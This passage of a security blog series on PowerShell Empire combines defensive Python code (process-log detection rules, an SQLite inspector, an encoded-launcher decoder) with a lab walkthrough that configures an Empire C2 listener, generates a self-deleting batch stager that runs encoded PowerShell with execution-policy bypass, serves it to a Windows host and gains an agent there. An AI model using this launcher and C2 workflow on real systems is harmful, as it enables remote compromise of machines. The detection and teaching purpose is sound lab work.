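        if "New Process ID" in fields:
            records.append(fields)
    return records


def decode_encoded_command(cmdline):
    """Return the decoded -enc/-EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyse(records):
    """Return (pid, rule, detail) tuples for every record that matches a rule."""
    by_pid = {r["New Process ID"]: r for r in records}   # PID-only lookup: beware PID reuse
    findings = []
    for r in records:
        pid, cmd = r["New Process ID"], r.get("Process Command Line", "")
        child, parent = basename(r["New Process Name"]), basename(r.get("Creator Process Name", ""))
        decoded = decode_encoded_command(cmd)
        if decoded and SUSPICIOUS_PS.search(decoded):
            findings.append((pid, "encoded_launcher", decoded))
        if child == "powershell.exe" and parent == "cmd.exe":
            # one more hop up: was cmd.exe itself started by a browser?
            grandparent = by_pid.get(r.get("Creator Process ID"), {}).get("Creator Process Name", "")
            if basename(grandparent) in BROWSERS:
                findings.append((pid, "browser_cmd_powershell_chain", cmd))
        if parent in AUTO_ELEVATE and "High Mandatory" in r.get("Mandatory Label", ""):
            findings.append((pid, "high_integrity_child_of_autoelevate", parent))
        if child == "net1.exe" and re.search(r"(?i)localgroup\s+administrators", cmd):
            findings.append((pid, "local_admin_enum", cmd))
        if child == "schtasks.exe" and "/create" in cmd.lower() and SUSPICIOUS_PS.search(cmd):
            findings.append((pid, "schtasks_persistence", cmd))
    return findings


if __name__ == "__main__":
    for finding in analyse(parse_4688(SAMPLE_LOG)):
        print(*finding, sep=" | ")
```

The parent lookup is by PID only, so on a busy host you would also compare the creator's own creation time, or use Sysmon's ProcessGuid; and net1.exe is matched directly, since a rule keyed on net.exe alone misses the actual command line, as the log above shows.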

That's it for this post. See you in the next post, where we look at things from the packets perspective.

Other posts in this series:

Beginning Powershell Empire - The Attack in 10 steps
Powershell Empire Log Analysis
Powershell Empire Packet Analysis
Powershell Empire Detection with Snort
Powershell Empire - Detection with Zeek

Beginning Powershell Empire - The Attack in 10 steps

In this 5 part series, I'm learning more about Powershell Empire from the perspectives of using the tool, analyzing the logs that get created, and analyzing the packets as they traverse the network.

1. Setup PowerShell Empire

First, checking what services are currently listening on my local device.

┌──(root💀securitynik)-[~]
└─# ss --numeric --listening --tcp 
State        Recv-Q        Send-Q               Local Address:Port               Peer Address:Port       Process   

Next, I'm going to clear the database to remove any artifacts from before.

┌──(root💀securitynik)-[~/packets]
└─# powershell-empire server --reset
[*] Loading default config
[>] Would you like to reset your Empire instance? [y/N]: y
cp: cannot stat './powershell/Invoke-Obfuscation': No such file or directory
[*] Setting up database.
[*] Adding default user.
[*] Adding database config.
[*] Generating random staging key
[*] Adding default bypasses.
[*] Adding default keyword obfuscation functions.

Loading up the server side of PowerShell Empire with the default config file, while overriding the REST API bind address, the SocketIO port and the credentials on the command line.

┌──(root💀securitynik)-[~/packets]
└─# powershell-empire server --debug --config /etc/powershell-empire/config.yaml --restip 0.0.0.0 --socketport 9999 --username securitynik --password Testing1
Loading config from /etc/powershell-empire/config.yaml
[*] Loading stagers from: /usr/share/powershell-empire/empire/server/stagers/
[*] Loading modules from: /usr/share/powershell-empire/empire/server/modules/
[*] Loading listeners from: /usr/share/powershell-empire/empire/server/listeners/
[*] Loading malleable profiles from: /usr/share/powershell-empire/empire/server/data/profiles
[*] Searching for plugins at /usr/share/powershell-empire/empire/server/plugins
[*] Plugin csharpserver found.
[*] Initializing plugin...
[*] Doing custom initialization...
[*] Loading Empire C# server plugin
[*] Registering plugin with menu...
[*] Empire starting up...
Username updated
Password updated
[*] Starting Empire RESTful API on 0.0.0.0:1337
[*] Starting Empire SocketIO on 0.0.0.0:9999
[*] Testing APIs
[+] Empire RESTful API successfully started
[+] Empire SocketIO successfully started
[*] Cleaning up test user
Server >
EMPIRE TEAM SERVER | 0 Agent(s) | 0 Listener(s) | 1 Plugin(s)   

Verifying that the server is now listening.

┌──(root💀securitynik)-[~]
└─# ss --numeric --listening --tcp
State            Recv-Q           Send-Q                       Local Address:Port                       Peer Address:Port           Process           
LISTEN           0                128                                0.0.0.0:9999                            0.0.0.0:*                                
LISTEN           0                128                                0.0.0.0:1337                            0.0.0.0:*                      

With the server listening, time to connect the client.

┌──(root💀securitynik)-[~]
└─# powershell-empire client
[*] Loading default config
...

Use the 'connect' command to connect to your Empire server.
'connect -c localhost' will connect to a local empire instance with all the defaults
including the default username and password.
[*] Attempting to connect to server: localhost
[!] Invalid username and/or password
(Empire) >

Now that we are in the Empire client, time to connect to the server. The automatic connect to localhost above failed with an invalid username/password because the server was started with its own credentials, so the connection has to be made explicitly.

To get help while connecting, in the client console:
(Empire) > connect --help
(Empire) > connect https://10.0.0.107 --port=1337 --socketport=9999 --username=securitynik --password=Testing1

========================================================================================
 [Empire] Post-Exploitation Framework
========================================================================================
 [Version] 4.0.2 BC Security Fork | [Web] https://github.com/BC-SECURITY/Empire
========================================================================================
 [Starkiller] Multi-User GUI | [Web] https://github.com/BC-SECURITY/Starkiller
========================================================================================

   _______   ___  ___   ______    __   ______        _______
  |   ____| |   \/   | |   _  \  |  | |   _  \      |   ____|
  |  |__    |  \  /  | |  |_)  | |  | |  |_)  |     |  |__
  |   __|   |  |\/|  | |   ___/  |  | |      /      |   __|
  |  |____  |  |  |  | |  |      |  | |  |\  \----. |  |____
  |_______| |__|  |__| | _|      |__| | _| `._____| |_______|


       391 modules currently loaded

       0 listeners currently active

       0 agents currently active

[*] Connected to https://10.0.0.107
(Empire) >


Connected to https://10.0.0.107:1337. 0 agents. 1 unread messages. 

Looking at the server side of the communication, I see:

[+] securitynik connected to socketio

Further confirming that the client is connected to the server.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# ss --numeric --tcp | grep --perl-regexp "9999|1337"
ESTAB 0      0         10.0.0.107:9999    10.0.0.107:41866       
ESTAB 0      0         10.0.0.107:41866   10.0.0.107:9999 

Good stuff. We're making progress. 

Checking to see which listeners are currently configured if any.

(Empire) > listeners

┌Listeners List──────┬───────────────────┬────────────┬─────────┐
│ ID │ Name │ Module │ Listener Category │ Created At │ Enabled │
└────┴──────┴────────┴───────────────────┴────────────┴─────────┘

None! Setting up my first listener by reviewing and configuring some of the available options.

(Empire: listeners) > uselistener http

(Empire: uselistener/http) > info

 Author       @harmj0y                                                              
 Description  Starts a http[s] listener (PowerShell or Python) that uses a GET/POST 
              approach.                                                             
 Name         HTTP[S] 


 (Empire: uselistener/http) > set Cookie SecurityNik-HTTP-Listener-Cookie
[*] Set Cookie to SecurityNik-HTTP-Listener-Cookie

(Empire: uselistener/http) > set KillDate 11/22/2021
[*] Set KillDate to 11/22/2021

(Empire: uselistener/http) > set UserAgent SecurityNik-HTTP-Listener-User-Agent
[*] Set UserAgent to SecurityNik-HTTP-Listener-User-Agent

(Empire: uselistener/http) > set WorkingHours 00:00-23:59
[*] Set WorkingHours to 00:00-23:59

(Empire: uselistener/http) > set BindIP 10.0.0.107
[*] Set BindIP to 10.0.0.107

(Empire: uselistener/http) > set Port 443
[*] Set Port to 443


(Empire: uselistener/http) > set DefaultDelay 60
[*] Set DefaultDelay to 60

I changed the default delay / reachback from 5 seconds as I did not wish to see too much noise during the packet capturing.

Revisiting the configured options:

(Empire: uselistener/http) > options

┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                               │ Required │ Description                         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ BindIP           │ 10.0.0.107                          │ True     │ The IP to bind to on the control    │
│                  │                                     │          │ server.                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ CertPath         │                                     │ False    │ Certificate path for https          │
│                  │                                     │          │ listeners.                          │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Cookie           │ SecurityNik-HTTP-Listener-Cookie    │ False    │ Custom Cookie Name                  │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultDelay     │ 60                                  │ True     │ Agent delay/reach back interval (in │
│                  │                                     │          │ seconds).                           │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultJitter    │ 0.0                                 │ True     │ Jitter in agent reachback interval  │
│                  │                                     │          │ (0.0-1.0).                          │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultLostLimit │ 60                                  │ True     │ Number of missed checkins before    │
│                  │                                     │          │ exiting                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultProfile   │ /admin/get.php,/news.php,/login/pro │ True     │ Default communication profile for   │
│                  │ cess.php|Mozilla/5.0 (Windows NT    │          │ the agent.                          │
│                  │ 6.1; WOW64; Trident/7.0; rv:11.0)   │          │                                     │
│                  │ like Gecko                          │          │                                     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Headers          │ Server:Microsoft-IIS/7.5            │ True     │ Headers for the control server.     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Host             │ http://10.0.0.107                   │ True     │ Hostname/IP for staging.            │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ KillDate         │ 11/22/2021                          │ False    │ Date for the listener to exit       │
│                  │                                     │          │ (MM/dd/yyyy).                       │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Launcher         │ powershell -noP -sta -w 1 -enc      │ True     │ Launcher string.                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Name             │ http                                │ True     │ Name for the listener.              │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Port             │ 443                                 │ True     │ Port for the listener.              │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                             │ False    │ Proxy to use for request (default,  │
│                  │                                     │          │ none, or other).                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                             │ False    │ Proxy credentials                   │
│                  │                                     │          │ ([domain\]username:password) to use │
│                  │                                     │          │ for request (default, none, or      │
│                  │                                     │          │ other).                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ SlackURL         │                                     │ False    │ Your Slack Incoming Webhook URL to  │
│                  │                                     │          │ communicate with your Slack         │
│                  │                                     │          │ instance.                           │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ StagerURI        │                                     │ False    │ URI for the stager. Must use        │
│                  │                                     │          │ /download/. Example:                │
│                  │                                     │          │ /download/stager.php                │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ StagingKey       │ ?4M6q)cLnvli}UCsu:rwf![~]79{#=O/    │ True     │ Staging key for initial agent       │
│                  │                                     │          │ negotiation.                        │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ SecurityNik-HTTP-Listener-User-     │ False    │ User-agent string to use for the    │
│                  │ Agent                               │          │ staging request (default, none, or  │
│                  │                                     │          │ other).                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ WorkingHours     │ 00:00-23:59                         │ False    │ Hours for the agent to operate      │
│                  │                                     │          │ (09:00-17:00).                      │
└──────────────────┴─────────────────────────────────────┴──────────┴─────────────────────────────────────┘

With the above configured, I then run execute to start the Listener.

(Empire: uselistener/http) > execute
[+] Listener http successfully started

On the server side, the following was seen:

[*] Starting listener 'http'
[+] Listener successfully started!
Server >

EMPIRE TEAM SERVER | 0 Agent(s) | 1 Listener(s) | 1 Plugin(s)    

Running the listeners command again, this time I see:

(Empire: uselistener/http) > listeners

┌Listeners List──────┬───────────────────┬──────────────────────────────────────────┬─────────┐
│ ID │ Name │ Module │ Listener Category │ Created At                               │ Enabled │
├────┼──────┼────────┼───────────────────┼──────────────────────────────────────────┼─────────┤
│ 1  │ http │ http   │ client_server     │ 2021-11-20 12:35:47 EST (48 seconds ago) │ True    │
└────┴──────┴────────┴───────────────────┴──────────────────────────────────────────┴─────────┘

Further confirming there is a listener on port 443.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# ss --numeric --tcp --listening 
State         Recv-Q        Send-Q               Local Address:Port               Peer Address:Port       Process        
LISTEN        0             128                        0.0.0.0:9999                    0.0.0.0:*                         
LISTEN        0             128                        0.0.0.0:1337                    0.0.0.0:*                         
LISTEN        0             128                     10.0.0.107:443                     0.0.0.0:*   

With the listener configured, next up, selecting a stager.

I selected windows/launcher_bat. This creates a self-deleting batch file.

(Empire: listeners) > usestager windows/launcher_bat

(Empire: usestager/windows/launcher_bat) > set Listener http
[*] Set Listener to http

(Empire: usestager/windows/launcher_bat) > set OutFile welcome.bat
[*] Set OutFile to welcome.bat

(Empire: usestager/windows/launcher_bat) > set UserAgent securitynik-launcher-bat-User-Agent
[*] Set UserAgent to securitynik-launcher-bat-User-Agent

Reviewing the configured options.

(Empire: usestager/windows/launcher_bat) > options

┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                               │ Required │ Description                         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw                  │ False    │ Bypasses as a space separated list  │
│                  │                                     │          │ to be prepended to the launcher     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Delete           │ True                                │ False    │ Switch. Delete .bat after running.  │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Language         │ powershell                          │ True     │ Language of the stager to generate. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                                │ True     │ Listener to generate stager for.    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False                               │ False    │ Switch. Obfuscate the launcher      │
│                  │                                     │          │ powershell code, uses the           │
│                  │                                     │          │ ObfuscateCommand for obfuscation    │
│                  │                                     │          │ types. For powershell only.         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1                         │ False    │ The Invoke-Obfuscation command to   │
│                  │                                     │          │ use. Only used if Obfuscate switch  │
│                  │                                     │          │ is True. For powershell only.       │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ OutFile          │ welcome.bat                         │ False    │ Filename that should be used for    │
│                  │                                     │          │ the generated output, otherwise     │
│                  │                                     │          │ returned as a string.               │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                             │ False    │ Proxy to use for request (default,  │
│                  │                                     │          │ none, or other).                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                             │ False    │ Proxy credentials                   │
│                  │                                     │          │ ([domain\]username:password) to use │
│                  │                                     │          │ for request (default, none, or      │
│                  │                                     │          │ other).                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ StagerRetries    │ 0                                   │ False    │ Times for the stager to retry       │
│                  │                                     │          │ connecting.                         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ securitynik-launcher-bat-User-Agent │ False    │ User-agent string to use for the    │
│                  │                                     │          │ staging request (default, none, or  │
│                  │                                     │          │ other).                             │
└──────────────────┴─────────────────────────────────────┴──────────┴─────────────────────────────────────┘

With everything in place, time to generate the welcome.bat file.

(Empire: usestager/windows/launcher_bat) > generate
[*] welcome.bat written to /usr/share/powershell-empire/empire/client/generated-stagers/welcome.bat

Copy the file to the /tmp folder.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# cd /tmp/

┌──(root💀securitynik)-[/tmp]
└─# cp /usr/share/powershell-empire/empire/client/generated-stagers/welcome.bat .

┌──(root💀securitynik)-[/tmp]
└─# ls -l welcome.bat 
-rw-r--r-- 1 root root 4009 Nov 20 12:45 welcome.bat

Looking at the folders in the powershell-empire path.

┌──(root💀securitynik)-[/tmp]
└─# ls /var/lib/powershell-empire/
data  empire  empire.db  empire.debug  LastTask

Being a little curious to see what is in the empire.db file so far, using strings I see ...

┌──(root💀securitynik)-[/tmp]
└─# strings /var/lib/powershell-empire/empire.db | more

SQLite format 3
]3
securitynik$2b$12$uoR.NXYK98MnTFe1kWuqGOoTvRYiuhoDys2f65.Ywq9bHDVNeU40Wlffg4uuayna6os6iur3ua46t9um0ylp7hc4k8ufm2021-11-20
 17:18:31
^3httphttpclient_server
Name
Description
Name for the listener.
Required
Value
http
SuggestedValues
Strict
Host
Hostname/IP for staging.
http://10.0.0.107:443
BindIP
(The IP to bind to on the control server.
10.0.0.107

... TRUNCATED FOR BREVITY ...
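strings is lossy: it shows the bytes but not which table, column or row they came from. As an added example (not Empire's code, and making no assumption about Empire's real schema), here is how to inspect an SQLite file such as empire.db read-only with Python's sqlite3 module and search every column for a value. The sample database is constructed in memory with an invented two-table schema so the code runs stand-alone; open_readonly is what you would point at the real file.

```python
import json
import sqlite3


def open_readonly(path: str) -> sqlite3.Connection:
    """Open an existing SQLite file read-only so the evidence cannot be modified."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def list_tables(conn: sqlite3.Connection) -> dict:
    """Map each user table to its column names (sqlite_master + PRAGMA table_info)."""
    names = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' "
        "AND name NOT LIKE 'sqlite_%' ORDER BY name")]
    return {n: [c[1] for c in conn.execute(f'PRAGMA table_info("{n}")')] for n in names}


def row_counts(conn: sqlite3.Connection) -> dict:
    """Number of rows per table: a quick sense of how busy the server has been."""
    return {t: conn.execute(f'SELECT COUNT(*) FROM "{t}"').fetchone()[0]
            for t in list_tables(conn)}


def find_text(conn: sqlite3.Connection, needle: str) -> list:
    """Like `strings | grep`, but reports (table, column, rowid) for every hit."""
    hits = []
    for table, cols in list_tables(conn).items():
        for col in cols:
            # CAST so numeric/blob columns are searched as text too; instr() avoids
            # LIKE wildcard semantics, so the needle is matched literally.
            rows = conn.execute(
                f'SELECT rowid FROM "{table}" WHERE instr(CAST("{col}" AS TEXT), ?) > 0',
                (needle,))
            hits.extend((table, col, r[0]) for r in rows)
    return hits


def build_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for a C2 database; the schema here is invented, not Empire's."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        CREATE TABLE listeners (id INTEGER PRIMARY KEY, name TEXT, module TEXT, options TEXT);
    """)
    conn.execute("INSERT INTO users VALUES (1, ?, ?)",
                 ("operator", "$2b$12$CONSTRUCTED-BCRYPT-PLACEHOLDER"))
    options = json.dumps({"Name": "http", "Host": "http://10.0.0.107:443",
                          "StagingKey": "CONSTRUCTED-STAGING-KEY-PLACEHOLDER"})
    conn.execute("INSERT INTO listeners VALUES (1, 'http', 'http', ?)", (options,))
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    print(list_tables(db))
    print(row_counts(db))
    print(find_text(db, "10.0.0.107"))
```

On a real server you would replace build_sample_db() with open_readonly("/var/lib/powershell-empire/empire.db") and then call find_text with the listener host or staging key to learn exactly which table holds it. Tables declared WITHOUT ROWID have no rowid and would need their primary key selected instead.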

Looking at a snapshot of the content of the welcome.bat file.

┌──(root💀securitynik)-[/tmp]
└─# cat welcome.bat 
# 2>NUL & @CLS & PUSHD "%~dp0" & "%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" -nol -nop -ep bypass "[IO.File]::ReadAllText('%~f0')|iex" & DEL "%~f0" & POPD /B
powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBFAFIAUwBpAG8ATgBUAGEAQgBsAEUALgBQAFMAVgBFAHIAcwBpAG8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBmAC4ARwBF... TRUNCATED FOR BREVITY ... YQBUAGEAWwAwAC4ALgAzAF0AOwAkAEQAQQB0AEEAPQAkAGQAYQBUAGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUATgBHAHQAaABdADsALQBqAE8ASQBuAFsAQwBIAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
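
Rather than reading that blob by eye, here is a small decoder, added to this write-up as an example (it is not code from Empire or from the original post). powershell.exe's -EncodedCommand takes base64 of the UTF-16LE script, and the other abbreviated switches on that line each mean something a defender cares about: -noP is -NoProfile, -w 1 is -WindowStyle Hidden, -ep bypass is -ExecutionPolicy Bypass. The sample launcher below is constructed in the same two-line shape as welcome.bat, but its encoded payload is a harmless Write-Host; the real stager blob from the file is not reproduced here.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of a parameter name, so launchers
# abbreviate heavily. Map the short forms seen on command lines to canonical names.
SWITCH_ALIASES = {
    "nop": "NoProfile", "noprofile": "NoProfile",
    "nol": "NoLogo", "nologo": "NoLogo",
    "noni": "NonInteractive", "noninteractive": "NonInteractive",
    "sta": "Sta",
    "w": "WindowStyle", "win": "WindowStyle", "windowstyle": "WindowStyle",
    "ep": "ExecutionPolicy", "ex": "ExecutionPolicy", "exec": "ExecutionPolicy",
    "executionpolicy": "ExecutionPolicy",
    "e": "EncodedCommand", "ec": "EncodedCommand", "enc": "EncodedCommand",
    "encodedcommand": "EncodedCommand",
}
# -WindowStyle accepts the enum name or its numeric value; 1 is Hidden.
WINDOW_STYLES = {"0": "Normal", "1": "Hidden", "2": "Minimized", "3": "Maximized"}

# A switch, followed by an optional value that is not itself another switch.
SWITCH_RE = re.compile(r"(?<!\S)-([A-Za-z]+)(?:\s+(?!-)(\S+))?")


def encode_powershell(command: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Reverse of encode_powershell; tolerates whitespace inside the blob."""
    return base64.b64decode("".join(blob.split())).decode("utf-16-le")


def analyze_launcher_line(line: str) -> dict:
    """Report the switches on one command line and decode any -EncodedCommand."""
    switches = {}
    for m in SWITCH_RE.finditer(line):
        canon = SWITCH_ALIASES.get(m.group(1).lower())
        if canon:
            switches[canon] = m.group(2)
    window = switches.get("WindowStyle")
    if window is not None:
        window = WINDOW_STYLES.get(window, window).capitalize()
    indicators = []
    if "NoProfile" in switches:
        indicators.append("profile scripts skipped (-NoProfile)")
    if window == "Hidden":
        indicators.append("console window hidden (-WindowStyle Hidden)")
    if (switches.get("ExecutionPolicy") or "").lower() == "bypass":
        indicators.append("execution policy bypassed")
    decoded = None
    if switches.get("EncodedCommand"):
        decoded = decode_encoded_command(switches["EncodedCommand"])
        indicators.append("encoded command (decoded)")
    return {"switches": switches, "window_style": window,
            "decoded_command": decoded, "indicators": indicators}


def analyze_launcher(text: str) -> list:
    """Analyze every non-empty line of a launcher file."""
    return [analyze_launcher_line(l) for l in text.splitlines() if l.strip()]


# Constructed sample in the same two-line shape as welcome.bat: the batch self-delete
# wrapper, then the encoded PowerShell. The payload is a benign Write-Host, not a stager.
SAMPLE_PAYLOAD = "Write-Host 'constructed sample, not a stager'"
SAMPLE_LAUNCHER = (
    '# 2>NUL & @CLS & PUSHD "%~dp0" & '
    '"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    '-nol -nop -ep bypass "[IO.File]::ReadAllText(\'%~f0\')|iex" & DEL "%~f0" & POPD /B\n'
    "powershell -noP -sta -w 1 -enc " + encode_powershell(SAMPLE_PAYLOAD) + "\n"
)

if __name__ == "__main__":
    for result in analyze_launcher(SAMPLE_LAUNCHER):
        print(result["indicators"])
        if result["decoded_command"]:
            print("decoded:", result["decoded_command"])
```

The same decode applies to the CommandLine field of a process-creation event (Sysmon Event ID 1 or Security 4688), which is where a defender will usually meet an -enc string; the batch line on its own is enough to raise an alert, since a hidden window plus a profile skip plus an encoded command is rarely how an administrator runs PowerShell.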

Interesting! Time to get this file to the target system. Set up a Python SimpleHTTPServer.

┌──(root💀securitynik)-[/tmp]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

2.  Gaining Access

To gain access, we have to get the welcome.bat file to the user or influence the user to download and/or open this file. Using the browser, I'm going to download and execute the file.

Below shows the file being downloaded.

┌──(root💀securitynik)-[/tmp]
└─#  python -m SimpleHTTPServer 80 
Serving HTTP on 0.0.0.0 port 80 ...
10.0.0.110 - - [20/Nov/2021 12:56:02] "GET / HTTP/1.1" 200 -
10.0.0.110 - - [20/Nov/2021 12:56:04] code 404, message File not found
10.0.0.110 - - [20/Nov/2021 12:56:04] "GET /favicon.ico HTTP/1.1" 404 -
10.0.0.110 - - [20/Nov/2021 12:56:10] "GET /welcome.bat HTTP/1.1" 200 -

With the file downloaded, once it is run, here is what we see on the client console of Powershell Empire:

[+] New agent E7ULVTA6 checked in
[*] Sending agent (stage 2) to E7ULVTA6 at 10.0.0.110
(Empire: usestager/windows/launcher_bat) >

and on the server side of empire ...

[*] Sending POWERSHELL stager (stage 1) to 10.0.0.110
[*] New agent E7ULVTA6 checked in
[+] Initial agent E7ULVTA6 from 10.0.0.110 now active (Slack)
[*] Sending agent (stage 2) to E7ULVTA6 at 10.0.0.110

Listing the agents, I see ...

(Empire: usestager/windows/launcher_bat) > agents

┌Agents─────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐
│ ID │ Name     │ Language   │ Internal IP │ Username             │ Process    │ PID  │ Delay  │ Last Seen               │ Listener │
├────┼──────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 1  │ E7ULVTA6 │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 13:40:10 EST │ http     │
│    │          │            │             │                      │            │      │        │ (30 seconds ago)        │          │
└────┴──────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘

Renaming the agent to something more meaningful. 

(Empire: agents) > rename E7ULVTA6 SANS560WINlowpriv

Listing the agents, we see:

(Empire: agents) > list

┌Agents──────────────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐
│ ID │ Name              │ Language   │ Internal IP │ Username             │ Process    │ PID  │ Delay  │ Last Seen               │ Listener │
├────┼───────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 1  │ SANS560WINlowpriv │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 13:43:22 EST │ http     │                                                                                    
│    │                   │            │             │                      │            │      │        │ (18 seconds ago)        │          │                                                                                    
└────┴───────────────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘

Interacting with the agent.

(Empire: agents) > interact SANS560WINlowpriv
(Empire: SANS560WINlowpriv) >

Now that we have an agent, a downloads folder has been created for that agent. There is also a file named LastTask.

┌──(root💀securitynik)-[/tmp]
└─# ls /var/lib/powershell-empire/
data  downloads  empire  empire.db  empire.debug  LastTask

In the downloads folder, there is a folder named SANS560WINlowpriv, which represents the agent. Here is what gets written to the agent.log file in that folder once the agent is registered.

┌──(root💀securitynik)-[/tmp]
└─# cat /var/lib/powershell-empire/downloads/SANS560WINlowpriv/agent.log | more

2021-11-20 13:04:03 : 

[*] Agent info:
  ID                    1
  session_id            E7ULVTA6
  listener              http
  name                  E7ULVTA6
  language              powershell
  language_version      5
  delay                 60
  jitter                0.0
  external_ip           10.0.0.110
  internal_ip           10.0.0.110
  username              SEC560STUDENT\sec560
  high_integrity        0
  process_name          powershell
  process_id            3600
  hostname              SEC560STUDENT
  os_details            Microsoft Windows 10 Enterprise
  session_key           EXaWl+/do>Rk8ef2g`[^$t7D}Oywz\NC
  nonce                 2658109564916705
  checkin_time          2021-11-20 18:04:02+00:00
  lastseen_time         2021-11-20 18:04:03+00:00
  parent                None
  children              None
  servers               None
  profile               /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT
                                6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  kill_date             11/22/2021
  working_hours         00:00-23:59
  lost_limit            60

[+] Agent E7ULVTA6 now active:


2021-11-20 13:43:22 : 
[*] Agent renamed from E7ULVTA6 to SANS560WINlowpriv

Moving forward, I will be tailing this file as follows, to see what is written as the tasks are executed.

┌──(root💀securitynik)-[/tmp]
└─# tail --follow --lines 0 /var/lib/powershell-empire/downloads/SANS560WINlowpriv/agent.log 

3. Examining the system

With access gained, time to examine the system. First up, whoami.

(Empire: SANS560WINlowpriv) > whoami
[*] Tasked E7ULVTA6 to run Task 1

Looking at the agent.log, I see.

2021-11-20 13:55:25 : 
tasked agent E7ULVTA6 to run command whoami

2021-11-20 13:56:12 : 
SEC560STUDENT\sec560

Looking at process information on the host.

(Empire: SANS560WINlowpriv) > ps
[*] Tasked E7ULVTA6 to run Task 2

Confirming the activity from the agent.log file.

2021-11-20 14:36:14 : 
